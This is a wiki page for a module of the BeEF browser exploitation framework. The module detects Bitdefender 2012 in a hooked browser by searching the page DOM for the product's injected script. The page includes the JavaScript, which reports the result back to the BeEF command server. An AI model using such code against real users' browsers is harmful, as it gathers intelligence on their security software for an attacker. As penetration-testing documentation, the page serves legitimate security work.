-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: detect bitdefender2012
Haoxi Tan edited this page Jan 6, 2020
·
2 revisions
- Objective: Detect Bit Defender 2012 on the system
- Date: June 2013
- Authors: Nbblrr
- Browsers: All
- Code
Bit Defender 2012 includes a javascript script in each browser to display this bar :
So it is easy to look for the script in the DOM :
var temp=document.body.innerHTML;
var key="netdefender/hui/ndhui.js";
if(temp.indexOf(key)>0) {
beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Installed');
} else {
beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Not Installed');
};
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK